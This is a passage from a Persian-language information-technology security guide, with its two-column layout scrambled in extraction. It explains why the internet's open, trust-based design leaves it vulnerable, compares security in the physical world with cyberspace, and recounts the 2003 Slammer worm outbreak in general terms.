ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺑـﺎﺭﺓ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴـﺪ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﻛﻨﻴـﺪ ﻭ ﻫـﺮ ﻛـﺲ
ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺕ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ
Transmission Control Protocol/Internet
Protocol
Internet Engineering Task Force
Bandwidth
Wireless Local Area Networks
38
39
40
41
ﺑﺨﺶ ﺍﻭﻝ
ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻣﺆﺛﺮ ،ﻭﺍﻗﻊ ﮔﺮﺍﻳﺎﻧﻪ ،ﻭ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑـﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺑﺎﺷﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ ﻛﻪ ﻫﺮ ﺷﺒﻜﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﺧـﺎﻧﻮﺍﺩﻩﺍﻱ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ
٣٨TCP/IPﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻥ ﻣﺘـﺼﻞ ﺷـﻮﺩ ﻭ
ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﻣﺤﺴﻮﺏ ﮔﺮﺩﺩ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺍﻳـﻦ
ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ﺗﻮﺳﻂ ٣٩IETFﺍﺭﺍﺋﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ
ﻻ ﺑﺪﻧﺔ ﻓﻨﻲ ﻏﻴﺮﺭﺳﻤﻲ ﺁﻧﻬﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺷﺎﻳـﺴﺘﻪﺳـﺎﻻﺭﻱ
ﻣﻌﻤﻮ ﹰ
ﻓﻨﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻮﺍﻓﻘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﺩ.
٣٦
ﺟﺎﻧﺐ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﻭ ﺍﺯ ﺁﻥ ﺧـﺪﻣﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻗﺎﺑـﻞ ﻛﻨﺘـﺮﻝ ﻭ ﺷـﻨﻮﺩ
ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ
ﻛﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺭﺳـﺎﻟﻴﺘﺎﻥ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺷـﻨﻮﺩ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻳﺎ ﺧﻴﺮ.
ﺑﻌﻼﻭﻩ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ
ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺧـﺎﺭﺟﻲ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ
ﻼ ﺍﺯ ISPﺧـﻮﺩ ﺑﺨﻮﺍﻫﻴـﺪ ﻛـﻪ
ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ -ﻣـﺜ ﹰ
ﭘﻴﺎﻣﻬﺎﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺧﻮﺩﺗـﺎﻥ ﺗـﺪﻭﻳﻦ
ﻣﻲﻛﻨﻴﺪ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﻌﺎﻣﻠﻲ ﺍﺳﺖ؛ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﻭ ﺑـﺎ
ﺳﺮﻋﺖ ﭼﻨﺪﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ،ﻳﺎ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭﻱ
ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺍﺯ
ﺁﻧﺠﺎ ﻛﻪ ﺯﻣﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑـﺮﺧﻂ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﻣﻴـﺰﺍﻥ
ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﺩﺍﺭﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳـﺦ
ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻛﻤﻲ ﻃﻮﻝ ﺑﻜﺸﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺳﺎﺱ ﺁﻥ ﺑﺮ
ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻫﻤﻜﺎﺭ ﻭ ﻧﺴﺒﺘﹰﺎ ﻣـﺸﺎﺑﻪ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ
ﺩﺍﺷﺖ ﻭ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻄﻤﺌﻦ،
ﺩﺭ ﺁﻥ ﺑﻪ ﻫﻤﻪ ﺍﻋﺘﻤﺎﺩ ﻣـﻲﺷـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ
ﺍﻳﻨﺘﺮﻧــﺖ ﺭﺍ ﺑــﻪ ﺷــﻤﺎ ﺷﻨﺎﺳــﺎﻧﺪﻩ ﻭ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ
ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑــﻪ ﺷــﻤﺎ ﺩﺭ ﻛــﺎﻫﺶ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﻓـﻮﻕ ﺗـﺎﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺫﻫـﻦ ﺧـﻮﺩ
ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻧـﻮﻉ ﻓﻌﺎﻟﻴـﺖ
ﻣﺠﺎﺯ ﺍﺳﺖ ﻭ ﭼﻴﺰﻱ ﺩﺭ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺖ ﻧـﺪﺍﺭﺩ ﻭ ﺗﺤـﺖ ﻛﻨﺘـﺮﻝ
ﻧﻴــﺴﺖ .ﺍﻳــﻦ ﻓــﻀﺎﻱ ﺑــﺎﺯ ﺑﺨــﻮﺑﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﭘﮋﻭﻫــﺸﻲ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﻓﻮﺍﻳﺪ ﺁﻧﺮﺍ ﺑـﺮﺍﻱ ﺗﻤـﺎﻣﻲ
ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﻣﻲ ﻧﻤﺎﻳﺎﻧﺪ .ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺎ ﻫـﺪﻑ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ
ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺛﻤﺮﺍﺕ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣـﺸﺘﺮﻙ
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻣﻴـﺰﺍﻥ ﺁﺯﺍﺩﻱ ﻋﻤـﻞ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻭ
ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ .ﻣﺎ ﺍﺑﺘـﺪﺍ ﺑﺎﻳـﺪ ﻣﺎﻫﻴـﺖ
ﺍﻳﻦ ﻧﻮﻉ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ
ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻣﻦ ﻛﻨﻴﻢ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻮﺿﻮﻋﺎﺕ ﻣﻄﺮﺡ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧﻪ ،ﺷﺒﻜﻪ ﻭ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻤﺎﻧﻨـﺪ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻫﺴﺘﻨﺪ ،ﻭﻟﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺭﻭﺍﻟﻬـﺎﻱ
ﻼ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺑﻬﺎﻱ
ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﻣﺜ ﹰ
ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻳﺎ ﺧـﺪﻣﺎﺕ ﺭﺍ ﻓـﺮﺍﻫﻢ
ﻣﻲﺁﻭﺭﻧﺪ ،ﺑﻪ ﺟﺎﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻳـﺎ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺩﺍﺭﺍﻱ
ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ٤٢ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ ٤٣ﻫـﺴﺘﻴﻢ ﻭ ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﭘﺎﻛﺘﻬﺎﻱ ﺩﺭﺑﺴﺘﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺩﺍﺩﺓ ﺍﻧﺘﻘـﺎﻟﻲ
ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ،ﻏﻴﺮﻗﺎﺑﻞ
ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﺪ.
ﺩﺭ ﻣﻘﺎﻳﺴﺔ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺎ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺗﺨﻠﻔـﺎﺕ
ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺒﻴﻨـﻴﻢ .ﺩﺭ
ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ﻭ ﻳـﺎ ﺍﻣـﻀﺎﻫﺎﻱ
ﺟﻌﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻫﺮ ﺩﻭ ﻓﻀﺎ ﺍﻣﻜﺎﻥ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ
ﻏﻠﻂ ﻳﺎ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻫﻤﭽﻨـﻴﻦ ﺍﻣﻜـﺎﻥ
ﺑـﻪ ﺍﺷـﺘﺒﺎﻩ ﺍﻧــﺪﺍﺧﺘﻦ ﺍﺷــﺨﺎﺹ ﺑـﺎ ﺍﻃﻼﻋــﺎﺕ -ﭼــﻪ ﺑــﺼﻮﺭﺕ
ﺗﺼﺎﺩﻓﻲ ﻭ ﭼﻪ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ -ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
ﻧﺘــﻮﺍﻥ ﺗﻌﻴــﻴﻦ ﻛــﺮﺩ ﻛــﻪ ﭼــﻪ ﺍﻃﻼﻋــﺎﺗﻲ ﻣﻬــﻢ ﻭ ﻗﺎﺑــﻞ ﺗﺄﻳﻴــﺪ
ﻫﺴﺘﻨﺪ ٤٤.ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺭ ﻫـﺮ ﺩﻭ ﻓـﻀﺎ ﺍﻣﻜـﺎﻥ ﺩﺳﺘﺮﺳـﻲ
ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺻـﺪ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﺍﻣﺎ ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺷﺒﺎﻫﺘﻬﺎ ﺳﻪ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ ﻣﻴـﺎﻥ ﺍﻳـﻦ ﺩﻭ ﻓـﻀﺎ
ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ:
ﺍﻭﻝ :ﻫﺮ ﻧﻮﻉ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ
ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ؛ ﻳﻌﻨﻲ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺁﮔـﺎﻩ ﺷـﻮﻳﺪ ﭼـﻪ
ﺍﺗﻔﺎﻗﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻓﺘﺎﺩﻩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﺑـﺮﺍﻱ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻳـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ .ﺍﻟﺒﺘـﻪ
ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ
ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻥ ﺯﻣـﺎﻥ
Username
Password
۴۴
ﻛﺎﭘﻴﺘﺎﻥ ﻛﺸﺘﻲ ﻣﻌﺮﻭﻑ ﺗﺎﻳﺘﺎﻧﻴـﻚ ﺍﺯ ﺭﺍﺩﻳـﻮﻱ ﺍﻭﻟﻴـﻪ ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ
ﺗﻤﺎﺱ ﺍﺯ ﻛﺸﺘﻲ ﺑﺎ ﺳﺎﺣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ .ﻣﻨﺸﻲ ﺭﺍﺩﻳﻮ ﻛﻪ ﺍﻭﻟﻴﻦ ﺳﻔﺮ
ﺩﺭﻳﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻣـﻲﻛـﺮﺩ ﺁﻧﻘـﺪﺭ ﭘﻴﺎﻣﻬـﺎﻱ ﺷﺨـﺼﻲ ﺩﺭﻳﺎﻓـﺖ
ﻣﻲﻧﻤﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ -ﻫﺸﺪﺍﺭ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻮﻩ ﻳﺨـﻲ ﺑـﺰﺭﮒ
ﺩﺭ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ﻛﺸﺘﻲ -ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻭ ﺷﺎﻳـﺴﺘﺔ ﭘﻴﮕﻴـﺮﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﺪ .ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺸﺘﻲ ﺑﺎ ﻛﻮﻩ ﻳﺨﻲ ﺑﺮﺧﻮﺭﺩ ﻛـﺮﺩ ﻭ
ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻌﺪ ﻏﺮﻕ ﺷﺪ.
42
43
٣٧
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺑﻪ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺮ ﺩﺭﺑﺎﺭﺓ ﻛﺮﻡ Slammerﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺳـﺎﻝ
۲۰۰۳ﻣﻴﻼﺩﻱ ﺑﺎﻋﺚ ﺧﺮﺍﺑﻲ ﺷﺪﻳﺪ ﺩﺭ ﻛﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺷـﺪ ﺗﻮﺟـﻪ
ﻛﻨﻴﺪ .ﺩﺭ ﺍﺛﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺮﻡ ،ﻛﺸﻮﺭﻫﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ ﺗﻤـﺎﻣﻲ
ﭘﻨﺞ ﻗﺎﺭﺓ ﺟﻬﺎﻥ ﺁﻟﻮﺩﻩ ﺷـﺪﻧﺪ ﻭ ﺑﺨـﺶ ﻋﻤـﺪﺓ ﺧﺮﺍﺑﻴﻬـﺎ ﻧـﺼﻴﺐ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺪ:
) Slammerﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ Sapphireﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ(
ﺳــﺮﻳﻌﺘﺮﻳﻦ ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﻃــﻮﻝ ﺣﻴــﺎﺕ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻩ .ﺑﺎ ﺷـﺮﻭﻉ ﮔـﺴﺘﺮﺵ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳـﺮ
ﺍﻳﻨﺘﺮﻧﺖ ،ﺑﻴﺶ ﺍﺯ %۹۰ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ٤٥ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﻋﺮﺽ
۱۰ﺩﻗﻴﻘﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻧﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻧﺠﺎﻡ
ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﻣــﺎﻟﻲ ﻭ ﺍﻣــﻮﺭ ﺣﻤـﻞ ﻭ ﻧﻘــﻞ ﻣﺆﺳــﺴﺎﺕ
ﺩﻭﻟﺘﻲ ﺷﺪ ﻭ ﺟـﺎﻳﻲ ﺑـﺮﺍﻱ ﻋﻜـﺲﺍﻟﻌﻤـﻞ ﺍﻧـﺴﺎﻧﻲ ﺑـﺎﻗﻲ
ﻧﮕﺬﺍﺷﺖ...
Slammerﻗﺒــﻞ ﺍﺯ ﺳــﺎﻋﺖ ٤٦UTC ۵:۳۰ﺭﻭﺯ ﺷــﻨﺒﻪ
۲۵ﮊﺍﻧﻮﻳــﻪ ۲۰۰۳ﻣــﻴﻼﺩﻱ ﺑــﺎ ﺑﻬــﺮﻩﺑــﺮﺩﺍﺭﻱ ﺍﺯ ﻳــﻚ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺳﺮﺭﻳﺰﻱ ﺑـﺎﻓﺮ ٤٧ﺑـﺎ ﻧﻔـﻮﺫ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ
ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ Microsoft SQL
Serverﻳﺎ Microsoft SQL Desktop Engine
) 2000 (MSDEﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻧﻔﻮﺫ ﻛﺮﺩ ﻭ ﺑﻪ ﺁﺭﺍﻣﻲ
ﺍﻗﺪﺍﻡ ﺑﻪ ﺁﻟﻮﺩﻩ ﺳﺎﺧﺘﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣﻴﺰﺑـﺎﻥ ﻧﻤـﻮﺩ.
ﺩﻳﻮﻳﺪ ﻟﻴﭽﻔﻴﻠﺪ ٤٨ﺩﺭ ﺟﻮﻻﻱ ﺳـﺎﻝ ۲۰۰۲ﻣـﻴﻼﺩﻱ ﺍﻳـﻦ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻧﻴـﺰ ﻗﺒـﻞ ﺍﺯ
ﺍﻧﺘــﺸﺎﺭ ﻛــﺮﻡ Slammerﻭﺻــﻠﻪﺍﻱ ﺑــﺮﺍﻱ ﺍﺻــﻼﺡ ﺁﻥ
٤٩
ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ.
ﺩﻭﻡ :ﻻﺯﻡ ﻧﻴﺴﺖ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺣـﻀﻮﺭ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺭﺍ ﺧﺪﺷـﻪﺩﺍﺭ ﻛﻨﻴـﺪ.
ﻼ ﻳﻚ ﻧﻔﺮ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ
ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺜ ﹰ
ﻲ ﻛـﺴﻲ ﻛـﻪ ﺩﺭ ﻫﻨـﺪ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﻫﺪﻑ ﺩﺭ ﻫﻨﺪ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧ ﹺ
